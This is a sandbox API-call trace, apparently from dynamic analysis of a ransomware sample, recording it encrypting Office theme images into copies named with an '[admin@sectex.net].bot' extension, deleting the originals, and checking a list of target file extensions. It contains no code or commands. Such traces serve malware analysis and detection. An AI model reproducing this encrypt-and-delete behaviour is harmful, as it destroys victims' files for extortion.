	[0043.428] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\capsules\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8
	[0043.431] GetFileSizeEx (in: hFile=0x1a8, lpFileSize=0xa41ff1c | out: lpFileSize=0xa41ff1c*=29925) returned 1
	[0043.431] CloseHandle (hObject=0x1a8) returned 1
	[0043.432] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\capsules\\thmbnail.png")) returned 0x20
	[0043.432] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\THMBNAIL.PNG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\capsules\\thmbnail.png.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0043.432] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\capsules\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8
	[0043.432] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0043.432] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0043.432] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\THMBNAIL.PNG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\capsules\\thmbnail.png.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1fc
	[0043.432] GetLastError () returned 0x0
	[0043.432] ReadFile (in: hFile=0x1a8, lpBuffer=0xafa0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa41fed4, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesRead=0xa41fed4*=0x74e5, lpOverlapped=0x0) returned 1
	[0043.434] WriteFile (in: hFile=0x1fc, lpBuffer=0xafa0020*, nNumberOfBytesToWrite=0x74f0, lpNumberOfBytesWritten=0xa41fc9c, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesWritten=0xa41fc9c*=0x74f0, lpOverlapped=0x0) returned 1
	[0043.435] ReadFile (in: hFile=0x1a8, lpBuffer=0xafa0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa41fed4, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesRead=0xa41fed4*=0x0, lpOverlapped=0x0) returned 1
	[0043.435] WriteFile (in: hFile=0x1fc, lpBuffer=0xafa0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa41fc9c, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesWritten=0xa41fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0043.435] SetEndOfFile (hFile=0x1fc) returned 1
	[0043.435] CloseHandle (hObject=0x1fc) returned 1
	[0043.436] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0043.436] SetEndOfFile (hFile=0x1a8) returned 1
	[0043.437] CloseHandle (hObject=0x1a8) returned 1
	[0043.437] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\THMBNAIL.PNG.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0043.438] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\capsules\\thmbnail.png")) returned 1
	[0043.438] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\THMBNAIL.PNG") returned 77
	[0043.438] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\THMBNAIL.PNG") returned 77
	[0043.438] lstrlenW (lpString=".doc") returned 4
	[0043.438] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1
	[0043.438] lstrlenW (lpString=".docx") returned 5
	[0043.438] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1
	[0043.438] lstrlenW (lpString=".pdf") returned 4
	[0043.438] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1
	[0043.438] lstrlenW (lpString=".xls") returned 4
	[0043.438] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1
	[0043.438] lstrlenW (lpString=".xlsx") returned 5
	[0043.438] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1
	[0043.438] lstrlenW (lpString=".ppt") returned 4
	[0043.438] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1
	[0043.438] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\THMBNAIL.PNG") returned 77
	[0043.438] lstrlenW (lpString=".zip") returned 4
	[0043.438] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1
	[0043.438] lstrlenW (lpString=".rar") returned 4
	[0043.438] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1
	[0043.438] lstrlenW (lpString=".bz2") returned 4
	[0043.438] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1
	[0043.438] lstrlenW (lpString=".7z") returned 3
	[0043.438] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1
	[0043.439] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\THMBNAIL.PNG") returned 77
	[0043.439] lstrlenW (lpString=".dbf") returned 4
	[0043.439] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1
	[0043.439] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\THMBNAIL.PNG") returned 77
	[0043.439] lstrlenW (lpString=".1cd") returned 4
	[0043.439] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1
	[0043.439] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\THMBNAIL.PNG") returned 77
	[0043.439] lstrlenW (lpString=".jpg") returned 4
	[0043.439] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1
	[0043.439] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\THMBNAIL.PNG") returned 77
	[0043.439] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\THMBNAIL.PNG") returned 77
	[0043.439] lstrlenW (lpString=".doc") returned 4
	[0043.439] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1
	[0043.439] lstrlenW (lpString=".docx") returned 5
	[0043.439] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1
	[0043.439] lstrlenW (lpString=".pdf") returned 4
	[0043.439] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1
	[0043.439] lstrlenW (lpString=".xls") returned 4
	[0043.439] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1
	[0043.439] lstrlenW (lpString=".xlsx") returned 5
	[0043.439] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1
	[0043.439] lstrlenW (lpString=".ppt") returned 4
	[0043.439] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1
	[0043.439] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\THMBNAIL.PNG") returned 77
	[0043.439] lstrlenW (lpString=".zip") returned 4
	[0043.439] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1
	[0043.439] lstrlenW (lpString=".rar") returned 4
	[0043.439] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1
	[0043.439] lstrlenW (lpString=".bz2") returned 4
	[0043.439] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1
	[0043.439] lstrlenW (lpString=".7z") returned 3
	[0043.439] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1
	[0043.439] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\THMBNAIL.PNG") returned 77
	[0043.439] lstrlenW (lpString=".dbf") returned 4
	[0043.440] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1
	[0043.440] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\THMBNAIL.PNG") returned 77
	[0043.440] lstrlenW (lpString=".1cd") returned 4
	[0043.440] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1
	[0043.440] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\THMBNAIL.PNG") returned 77
	[0043.440] lstrlenW (lpString=".jpg") returned 4
	[0043.440] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1
	[0043.440] lstrcmpiW (lpString1=".GIF", lpString2=".bot") returned 1
	[0043.440] lstrlenW (lpString="PREVIEW.GIF") returned 11
	[0043.440] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\cascade\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8
	[0043.440] GetFileSizeEx (in: hFile=0x1a8, lpFileSize=0xa41ff1c | out: lpFileSize=0xa41ff1c*=1363) returned 1
	[0043.440] CloseHandle (hObject=0x1a8) returned 1
	[0043.440] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\cascade\\preview.gif")) returned 0x20
	[0043.440] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\PREVIEW.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\cascade\\preview.gif.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0043.440] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\cascade\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8
	[0043.441] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0043.441] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0043.441] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\PREVIEW.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\cascade\\preview.gif.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1fc
	[0043.451] GetLastError () returned 0x0
	[0043.451] ReadFile (in: hFile=0x1a8, lpBuffer=0xafa0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa41fed4, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesRead=0xa41fed4*=0x553, lpOverlapped=0x0) returned 1
	[0043.455] WriteFile (in: hFile=0x1fc, lpBuffer=0xafa0020*, nNumberOfBytesToWrite=0x560, lpNumberOfBytesWritten=0xa41fc9c, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesWritten=0xa41fc9c*=0x560, lpOverlapped=0x0) returned 1
	[0043.456] ReadFile (in: hFile=0x1a8, lpBuffer=0xafa0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa41fed4, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesRead=0xa41fed4*=0x0, lpOverlapped=0x0) returned 1
	[0043.456] WriteFile (in: hFile=0x1fc, lpBuffer=0xafa0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0xa41fc9c, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesWritten=0xa41fc9c*=0xea, lpOverlapped=0x0) returned 1
	[0043.457] SetEndOfFile (hFile=0x1fc) returned 1
	[0043.457] CloseHandle (hObject=0x1fc) returned 1
	[0043.458] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0043.458] SetEndOfFile (hFile=0x1a8) returned 1
	[0043.459] CloseHandle (hObject=0x1a8) returned 1
	[0043.459] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\PREVIEW.GIF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0043.459] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\cascade\\preview.gif")) returned 1
	[0043.459] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\PREVIEW.GIF") returned 75
	[0043.459] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\PREVIEW.GIF") returned 75
	[0043.459] lstrlenW (lpString=".doc") returned 4
	[0043.459] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0043.460] lstrlenW (lpString=".docx") returned 5
	[0043.460] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1
	[0043.460] lstrlenW (lpString=".pdf") returned 4
	[0043.460] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0043.460] lstrlenW (lpString=".xls") returned 4
	[0043.460] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0043.460] lstrlenW (lpString=".xlsx") returned 5
	[0043.460] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1
	[0043.460] lstrlenW (lpString=".ppt") returned 4
	[0043.460] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0043.460] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\PREVIEW.GIF") returned 75
	[0043.460] lstrlenW (lpString=".zip") returned 4
	[0043.460] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0043.460] lstrlenW (lpString=".rar") returned 4
	[0043.460] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0043.460] lstrlenW (lpString=".bz2") returned 4
	[0043.460] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0043.460] lstrlenW (lpString=".7z") returned 3
	[0043.460] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0043.460] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\PREVIEW.GIF") returned 75
	[0043.460] lstrlenW (lpString=".dbf") returned 4
	[0043.460] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0043.460] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\PREVIEW.GIF") returned 75
	[0043.460] lstrlenW (lpString=".1cd") returned 4
	[0043.460] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0043.460] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\PREVIEW.GIF") returned 75
	[0043.460] lstrlenW (lpString=".jpg") returned 4
	[0043.460] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0043.460] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\PREVIEW.GIF") returned 75
	[0043.460] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\PREVIEW.GIF") returned 75
	[0043.460] lstrlenW (lpString=".doc") returned 4
	[0043.460] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0043.460] lstrlenW (lpString=".docx") returned 5
	[0043.461] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1
	[0043.461] lstrlenW (lpString=".pdf") returned 4
	[0043.461] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0043.461] lstrlenW (lpString=".xls") returned 4
	[0043.461] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0043.461] lstrlenW (lpString=".xlsx") returned 5
	[0043.461] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1
	[0043.461] lstrlenW (lpString=".ppt") returned 4
	[0043.461] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0043.461] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\PREVIEW.GIF") returned 75
	[0043.461] lstrlenW (lpString=".zip") returned 4
	[0043.461] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0043.461] lstrlenW (lpString=".rar") returned 4
	[0043.461] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0043.461] lstrlenW (lpString=".bz2") returned 4
	[0043.461] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0043.461] lstrlenW (lpString=".7z") returned 3
	[0043.461] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0043.461] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\PREVIEW.GIF") returned 75
	[0043.461] lstrlenW (lpString=".dbf") returned 4
	[0043.461] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0043.461] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\PREVIEW.GIF") returned 75
	[0043.461] lstrlenW (lpString=".1cd") returned 4
	[0043.461] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0043.461] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\PREVIEW.GIF") returned 75
	[0043.461] lstrlenW (lpString=".jpg") returned 4
	[0043.461] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0043.461] lstrcmpiW (lpString1=".PNG", lpString2=".bot") returned 1
	[0043.461] lstrlenW (lpString="THMBNAIL.PNG") returned 12
	[0043.461] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\cascade\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8
	[0043.462] GetFileSizeEx (in: hFile=0x1a8, lpFileSize=0xa41ff1c | out: lpFileSize=0xa41ff1c*=20371) returned 1
	[0043.462] CloseHandle (hObject=0x1a8) returned 1
	[0043.462] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\cascade\\thmbnail.png")) returned 0x20
	[0043.462] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\THMBNAIL.PNG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\cascade\\thmbnail.png.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0043.462] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\cascade\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8
	[0043.462] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0043.462] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0043.462] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\THMBNAIL.PNG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\cascade\\thmbnail.png.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1fc
	[0043.463] GetLastError () returned 0x0
	[0043.463] ReadFile (in: hFile=0x1a8, lpBuffer=0xafa0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa41fed4, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesRead=0xa41fed4*=0x4f93, lpOverlapped=0x0) returned 1
	[0043.813] WriteFile (in: hFile=0x1fc, lpBuffer=0xafa0020*, nNumberOfBytesToWrite=0x4fa0, lpNumberOfBytesWritten=0xa41fc9c, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesWritten=0xa41fc9c*=0x4fa0, lpOverlapped=0x0) returned 1
	[0043.814] ReadFile (in: hFile=0x1a8, lpBuffer=0xafa0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa41fed4, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesRead=0xa41fed4*=0x0, lpOverlapped=0x0) returned 1
	[0043.814] WriteFile (in: hFile=0x1fc, lpBuffer=0xafa0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa41fc9c, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesWritten=0xa41fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0043.815] SetEndOfFile (hFile=0x1fc) returned 1
	[0043.815] CloseHandle (hObject=0x1fc) returned 1
	[0043.815] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0043.815] SetEndOfFile (hFile=0x1a8) returned 1
	[0043.816] CloseHandle (hObject=0x1a8) returned 1
	[0043.816] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\THMBNAIL.PNG.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0043.816] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\cascade\\thmbnail.png")) returned 1
	[0043.816] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\THMBNAIL.PNG") returned 76
	[0043.816] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\THMBNAIL.PNG") returned 76
	[0043.816] lstrlenW (lpString=".doc") returned 4
	[0043.816] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1
	[0043.816] lstrlenW (lpString=".docx") returned 5
	[0043.816] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1
	[0043.816] lstrlenW (lpString=".pdf") returned 4
	[0043.816] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1
	[0043.816] lstrlenW (lpString=".xls") returned 4
	[0043.816] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1
	[0043.817] lstrlenW (lpString=".xlsx") returned 5
	[0043.817] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1
	[0043.817] lstrlenW (lpString=".ppt") returned 4
	[0043.817] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1
	[0043.817] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\THMBNAIL.PNG") returned 76
	[0043.817] lstrlenW (lpString=".zip") returned 4
	[0043.817] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1
	[0043.817] lstrlenW (lpString=".rar") returned 4
	[0043.817] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1
	[0043.817] lstrlenW (lpString=".bz2") returned 4
	[0043.817] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1
	[0043.817] lstrlenW (lpString=".7z") returned 3
	[0043.817] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1
	[0043.817] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\THMBNAIL.PNG") returned 76
	[0043.817] lstrlenW (lpString=".dbf") returned 4
	[0043.817] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1
	[0043.817] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\THMBNAIL.PNG") returned 76
	[0043.817] lstrlenW (lpString=".1cd") returned 4
	[0043.817] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1
	[0043.817] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\THMBNAIL.PNG") returned 76
	[0043.817] lstrlenW (lpString=".jpg") returned 4
	[0043.817] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1
	[0043.817] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\THMBNAIL.PNG") returned 76
	[0043.817] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\THMBNAIL.PNG") returned 76
	[0043.817] lstrlenW (lpString=".doc") returned 4
	[0043.817] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1
	[0043.817] lstrlenW (lpString=".docx") returned 5
	[0043.817] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1
	[0043.817] lstrlenW (lpString=".pdf") returned 4
	[0043.817] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1
	[0043.817] lstrlenW (lpString=".xls") returned 4
	[0043.817] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1
	[0043.817] lstrlenW (lpString=".xlsx") returned 5
	[0043.818] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1
	[0043.818] lstrlenW (lpString=".ppt") returned 4
	[0043.818] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1
	[0043.818] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\THMBNAIL.PNG") returned 76
	[0043.818] lstrlenW (lpString=".zip") returned 4
	[0043.818] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1
	[0043.818] lstrlenW (lpString=".rar") returned 4
	[0043.818] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1
	[0043.818] lstrlenW (lpString=".bz2") returned 4
	[0043.818] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1
	[0043.818] lstrlenW (lpString=".7z") returned 3
	[0043.818] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1
	[0043.818] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\THMBNAIL.PNG") returned 76
	[0043.818] lstrlenW (lpString=".dbf") returned 4
	[0043.818] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1
